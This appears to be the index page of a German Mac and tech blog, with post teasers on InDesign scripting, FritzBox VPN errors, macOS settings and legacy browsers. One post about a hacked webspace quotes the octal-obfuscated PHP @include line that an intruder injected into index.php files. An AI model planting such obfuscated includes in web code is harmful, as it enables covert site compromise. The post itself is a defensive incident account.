This page intentionally left blank
  Seite:  1 2 3  ...  15 16 17 >> 245 Artikel insgesamt   
Willkommen bei Apfel Z

Herzlich willkommen bei Apfel-Z

Bei Apfel-Z dreht sich alles um den Macintosh/MacOS X, Unix, das Web, Android und sonstige technische Basteleien. Weiterlesen...
 
InDesign: Tastenkürzel für vertikale Textausrichtung

Leider gibt es in InDesign kein Tastenkürzel, um die vertikale Textausrichtung zu ändern.

Immer den Textrahmenoptionen-Dialog öffnen und dort die gewünschte vertikale Ausrichtung zu ändern, ist etwas mühsam, wenn man dies in einem Layout mehrere Male ändern möchte (und nicht alle Textrahmen zusammen selektieren kann).

Ein einfaches Tastenkürzel, wie es auch bei der horizontalen Ausrichtung der Fall ist, wäre wünschenswert.

Deshalb habe ich ein kleines Script geschrieben, welches ich dem Skripts-Panel hinzugefügt und dann via Bearbeiten > Tastaturbefehle... ein Tastenkürzel zugewiesen habe.

Vertikale Textausrichtung aendern.jsx
if (app.selection.length == 0) {
  alert("Sie haben keine Objekte ausgew\u00e4hlt!");
} else {
  for (var x=0; x<app.selection.length; x++) {
    if (app.selection[x].hasOwnProperty("textFramePreferences")) {  
      switch (app.selection[x].textFramePreferences.verticalJustification) {  
        case VerticalJustification.TOP_ALIGN: app.selection[x].textFramePreferences.verticalJustification = VerticalJustification.CENTER_ALIGN;break;  
        case VerticalJustification.CENTER_ALIGN: app.selection[x].textFramePreferences.verticalJustification = VerticalJustification.BOTTOM_ALIGN;break;  
        case VerticalJustification.BOTTOM_ALIGN: app.selection[x].textFramePreferences.verticalJustification = VerticalJustification.TOP_ALIGN;break;  
        case VerticalJustification.JUSTIFY_ALIGN: app.selection[x].textFramePreferences.verticalJustification = VerticalJustification.TOP_ALIGN;break;  
        }
      }
    }
  }

Bei jedem Tastendruck ändert sich die vertikale Ausrichtung aller selektierten Textrahmen von Oben => Mitte => Unten => Oben => ...

Die Ausrichtung "Vertikaler Keil" habe ich weg gelassen, da ich persönlich sie so gut wie nie verwende (da kann man dann im Zweifelsfall auf den Textrahmenoptionen-Dialog zurückgreifen).
Sollten die Optionen Oben => Mitte => Unten => Vertikaler Keil => Oben => ... gewünscht werden, dann in Zeile 9 des Skriptes (vorletzter case) VerticalJustification.TOP_ALIGN; in VerticalJustification.JUSTIFY_ALIGN; ändern.

 
InDesign: Mehrere Objekte auf gleiche Größe bringen
Markiere ich in InDesign mehrere Objekte und will sie auf dieselbe Größe bringen, so ändere ich immer nur die Gesamtgröße aller markierten Objekte, statt jedes einzelnen Objektes.
Das macht meistens Sinn, aber manchmal möchte man es doch lieber anders haben...
 

Um schnell mehrere Rahmen auf dieselbe Größe zu bekommen, habe ich folgendes kleines Skript geschrieben, welches man der Skript-Palette hinzufügen kann.

Weiterlesen...
 
Neu eingerichteter FritzBox-zu-FritzBox-VPN funktioniert nicht

Ein Freund, mit dem ich ein FritzBox2FritzBox-VPN-Netzwerk habe, hat letztens von Unitymedia eine neue FritzBox auf's Auge gedrückt bekommen. Dass man hier tätig werden muss, wurde ihm dann allerdings erst klar, als sein Internet nicht mehr funktionierte. Also Box ausgetauscht und WLAN an Handy und Laptop neu eingerichtet – das schafft sogar der Laie.
Sowohl unsere VPN-Verbindung wie auch seine eigene zum Büro waren damit allerdings dahin.

Da ich schonmal Probleme damit hatte, auf einer neueren FritzBox die alte VPN-Config-Datei aufzuspielen (früher musste man ja mit einem separaten Windows-Programm eine Config-Datei erstellen, die man dann auf der FritzBox importieren konnte) und es ja inzwischen nur noch wenige Klicks sind, zwei FritzBoxen per VPN zu verbinden, entschied ich mich dafür, stattdessen die zwei VPN-Verbindungen neu einzurichten.

Kommen wir nun zum eigentlichen Problem:
Alles korrekt eingerichtet, aber nix funktioniert.

Meine heimische Box, von der ich die Verbindung zur Entfernten aufbauen möchte, bringt im Log die Fehlermeldung IKE-Error 0x2027, was sich nach etwas Recherche als ein timeout entpuppt.

In meinem Fall sind beide FritzBoxen an einem DynDns-Dienst registriert und könnten sich theoretisch gegenseitig im Internet finden. Da wirkt ein Timeout seltsam.

Etwas versteckt in der AVM-Wissensdatenbank stieß ich (zwischen den zu erwartenden sehr hilfreichen Informationen "Sind beide Boxen online?", "Haben Sie sich vertippt?", "Nochmals löschen und neu einrichten") auf die Info, dass die ganze Sache zum Scheitern verurteilt ist, sofern bei der entfernten FritzBox (die die Verbindung in dem Moment nicht herstellt) ein MyFRITZ!-Konto eingerichtet ist. Muss man nicht verstehen, ist aber so.
Kurzer Blick in die Einstellungen der neuen Unitymedia-FritzBox: Da hat der Kollege wohl an zu vielen Stellen herumgeklickt, als er versucht hatte, den HTTPS-Zugang zu aktivieren, so dass ich von fern wieder alles einrichten kann – MyFritz! war aktiv (siehe Bild rechts).

Haken raus, übernehmen und FritzBox dazu genötigt, neu zu starten (was bei einer von Unitymedia kastrierten FritzBox gar nicht so einfach ist).

Und promt klappt's mit der VPN-Verbindung.

Fazit

1. Will man zwei FritzBoxen per VPN verbinden und setzt auf beiden Seiten zum Auffinden auf DynDns (statt auf das ominöse properitäre MyFritz!), darf die MyFritz!-Funktion nicht aktiv sein

2. Ebenfalls kurios: Gebe ich statt einer DynDns-Adresse eine feste IP für die entferne FritzBox an, weil der Partner vielleicht eine feste IP hat, dann sollte auf der entfernten Box außerdem auch kein DynDns-Dienst eingerichtet sein. Auch dies würde zu einem IKE-Error 0x2027 führen

 
Alphakanal-Freisteller in InDesign

Man lernt nie aus!

Da arbeite ich schon in InDesign, seit es InDesign gibt, und kannte bisher nur die Freistellungs-Funktion über Objekt > Beschneidungspfad > Optionen...

Dass man, sofern das Bild einen Alphakanal besitzt, diesen auch über die Importoptionen beim Platzieren anwenden kann (siehe Bild rechts), war mir bis vor kurzem nicht bewusst.

Vorteil: Hier werden die echten Alphakanal-Informationen Pixel für Pixel zur Freistellung benutzt (während bei Alphakanälen und Objekt > Beschneidungspfad > Optionen... nur nährungsweise ein Pfad zur Freistellung verwendet wird).
Nachteil: Auswählen kann man den Alphakanal nur, wenn man das Bild über den Platzieren-Dialog platziert und dort dann auch den Haken "Importoptionen anzeigen" gesetzt hat. Mühsame Sache, wenn es sich um viele Bilder handelt. Vor allem ziehe ich die Bilder lieber per Drag&Drop ins Dokument.
Eigentlich unglaublich, dass das auch nach über einem Jahrzehnt und zu Zeiten, wo jedes Jahr ein neues "großes Update" erscheint, immer noch so umständlich ist.

Zum Glück kann man in InDesign ja fast alles mit einem Skript regeln...

Weiterlesen...
 
Bootfähiger Ubuntu-USB-Stick, MacBook Pro und WLAN

Vielleicht muss man sein MacBook mal kurz mit Ubuntu booten.
In meinem Fall wollte ich versuchen, die System-SD-Karte eines Raspberry Pi zu reparieren (was letztendlich leider nicht gelang).
Mit MacOS X war dies trotz Fuse nicht möglich, da man mit Fuse zwar das Ext4-Dateisystem mounten kann, allerdings nur Read-Only.
Blieb also nichts anderes übrig, als die Karte irgendwo mit einem Linux-System zu reparieren.

Weiterlesen...
 
Elektromobilität, die Henne und das Ei

Beim zögerlichen Vorankommen der Elektromobilität wird oft darum gestritten, ob es nun zu wenig akkubetriebene Autos gibt, weil es an der Ladeinfrastruktur hapert oder ob es an der Ladeinfrastruktur hapert, weil es zu wenig akkubetriebene Autos gibt.

Ich finde: Weder noch!

Weiterlesen...
 
FTP-Server auf Änderungen prüfen

Irgend ein Arsch wurschtelt in letzter Zeit immer in meinem Webspace rum. Verändert index.php-Skripte und fügt in jedes Verzeichnis eine index.php hinzu (sofern keine im Verzeichnis vorhanden war).

Inhalt (bzw. was hinzugefügt wurde) ist immer nur ein kryptisches (leicht geändert, da es auf meinen tatsächlichen Webspace verweist)

@include "\057ho\155e/\163tr\141to\057ht\164p/\160re\155iu\155/r\151d/\0684/\0621/\06112\06912\063/h\164do\143s/fo\156t/\0569d\070c3\142f2\056ic\157";

Wenn man die \xxx-Octal-UTF8-bytes zu ASCII-Zeichen umwandelt, sieht man, was für ein Pfad wirklich dahinter steckt.
Eine Datei .9d8c3bf2.ico konnte ich allerdings nicht finden

Wobei ich nicht feststellen kann, dass einer HTML-Seite letztendlich wirklich weiterer Code hinzugefügt wird. Die index.php, die nur dieses Include enthalten, sind bei einem Test-Aufruf einfach leer.

Beunruhigend ist, dass nach einem Entfernen und Ändern der FTP-Zugangsdaten nach einem Tag sofort wieder alle Spam-Dateien zurück sind.
Ob es eine Sicherheitslücke der Highcharts oder des jQuery File Upload ist, muss ich noch recherchieren.
Ich habe zwar noch weitere Maßnahmen zum "Dichtmachen" meines Webspaces ergriffen, aber zwecks Überwachung wollte ich eine tägliche Kontrolle, ob sich die Dateien in meinem Webspace geändert haben.

Weiterlesen...
 
Tote WD MyCloud wiederherstellen

Vor 3-4 Jahren hatte ich mir eine Western Digital MyCloud angeschafft, um mein heimisches Backup zu meinen Eltern rüberzuspiegeln.

Vor kurzem ist die Platte nach einem geplanten Neustart allerdings nicht mehr im Netzwerk erschienen. Die Status-LED leuchtet gelblich und auf dem Router taucht das Gerät nicht mehr auf.
In der Doku ist nur etwas über eine rote LED zu finden, aber Rot ist das nie und nimmer und die Erklärungen für die rote LED sind sowieso manigfaltig.

Da die Festplatte im Netzwerk nicht mehr aufzufinden ist und es auch sonst keine Schnittstellen gibt, um von außen irgendwas reparieren zu können (nein, die USB-Schnittstelle ist leider nur dazu da, eine weitere externe Platte zur Erweiterung an das NAS zu hängen), blieb nur der Griff zum Schraubenzieher.

Aber die gute Nachricht: Die Platte ließ sich wieder reparieren und die Daten waren sogar noch zu retten (was für mich allerdings keine Priorität hatte, da es sich sowieso nur um das Backup eines Backups handelte).

Weiterlesen...
 
apfel-z Comic
 
Dämliches Spaces-Verhalten ändern
Ich hielt es ja erst für einen unabänderbaren Bug und wäre auch nie auf die Idee gekommen, dass es in den Systemeinstellungen einen einfachen Haken gibt, der dieses Ärgernis beendet.

Problem: Verwendete man mehrere "Spaces" (z.B. Fenster im Vollbildmodus) und rechnet mit einer bestimmten Reihenfolge dieser Spaces von links nach rechts, so ändert sich ab und an die Reihenfolge.
Direkt nach dem Desktop folgt der VNC-Zugriff auf den Server, dann der Kalender...verwendet man einmal den Kalender, so ändert sich die Reihenfolge in Desktop-Kalender-VNC.
Was hatte ich schon geflucht!

Lösung: Entfernt man den Haken "Spaces automatisch anhand der letzten Verwendung ausrichten" in den Systemeinstellungen > Mission Control, bleiben die Spaces in der Reihenfolge, in der man sie gerne hätte.
 
Aktuelle Browser für MacOS X 10.6

Es ist inzwischen schwer bis unmöglich, für MacOS X 10.6 einen aktuellen Browser zu finden, der alle Websites so darstellt, wie sie eigentlich aussehen sollten.

Das systemeigene Safari ist auf dem Stand von 2011, (die neusten) Chrome- und Firefox-Browser lassen sich seit einiger Zeit auch nicht mehr installieren. Man möge doch mal sein Betriebssystem aktualisieren!

Nach langer Recherche bin ich zwar auf zwei Browser gestoßen, die wohl weiterhin entwickelt werden und unter MacOS X 10.6 laufen...aber für den täglichen Gebrauch sind sie leider auch nichts.

PaleMoon / NewMoon
https://forum.palemoon.org/viewforum.php?f=41
In dem Forum sind Downloads zu einem Port von PaleMoon zu finden, welcher unter MacOS X 10.6 läuft

Roccat
https://runecats.com/roccat-browser-for-mac/
Wohl aktuell, allerdings beim Rendern von Websites fast genauso mies wie das 7 Jahre alte Safari.

Leopard Webkit (nur MacOS X 10.5!)
https://sourceforge.net/projects/leopard-webkit/
Wer noch Mac OS X 10.5 im Einsatz hat, ist wesentlich besser dran. Auf Sourceforge findet sich ein Projekt, wo ein findiger Entwickler das aktuelle WebKit in nen alten Safari für 10.5 gepackt hat. Einwandfrei!
Bis vor ein paar Jahren gab es hier auch eine Version, die auf MacOS X 10.6 lief, aber mangels Entwickler wurde diese nicht weiterentwickelt.
 
Neues Finder-Fenster als Duplikat vom gerade geöffneten
Das Tastenkürzel Apfel-N öffnet seit der Einführung von MacOS X im Finder ein neues Fenster. Was in so einem neuen Fenster angezeigt werden soll, lässt sich ganz praktisch im Voreinstellungs-Dialog des Finders einstellen (siehe Bild rechts).

Doch eine eine wirklich hilfreiche Einstellungsmöglichkeit fehlt meiner Ansicht nach: Ein neu geöffnetes Fenster sollte am liebsten den selben Ordnerinhalt darstellen, wie das gerade im Vordergrund befindliche Fenster.
Denn meistens will man noch ein zweites Fenster mit einem Unter- oder Über-Ordner auf dem Bildschirm haben und sich dann nicht nochmals ganz neu durch das Dateisystem hangeln.

Ich habe mir bei diesem Problem von meinem Lieblings-Hotkey-Manager Butler helfen lassen.

Weiterlesen...
 
Suche auf Netzwerkfreigaben OHNE Spotlight

Als ich an meinem Arbeitsrechner von MacOS X 10.6 auf 10.9 updatete, hatte ich auf einmal einige Probleme, die meinen Workflow durcheinanderbrachten.

Eines der Probleme: Ich konnte auf keinem Server mehr nach Dateien suchen.
Apple findet es seit einigen Jahren schick, nur den Spotlight-Index zu durchsuchen, statt in einem gewählten Verzeichnis live nach Dateien zu suchen (das war unter MacOS X 10.6 nicht wirklich langsamer!). Und da für Netzwerkfreigaben kein Spotlight-Index angelegt wird, wird im Netzwerk halt gar nichts gefunden.
Der moderne User schert sich auch nicht um Arbeitsdateien, die auf einem Netzwerk-Server liegen und ist eher daran interessiert, den Anruf auf seinem iPhone am Mac weiterzuführen.

Weiterlesen...
 
MacOS 10.9 und Apache

Nach einem Update von MacOS X 10.6 auf 10.9 wurden auf einmal keine PHP-Skripte mehr vom Apache Webserver ausgeführt.

Außerdem gibt es in den Freigaben-Systemeinstellungen keine Möglichkeit mehr, den Apache Webserver (neu) zu starten :-(

Weiterlesen...
 
  Seite:  1 2 3  ...  15 16 17 >> 245 Artikel insgesamt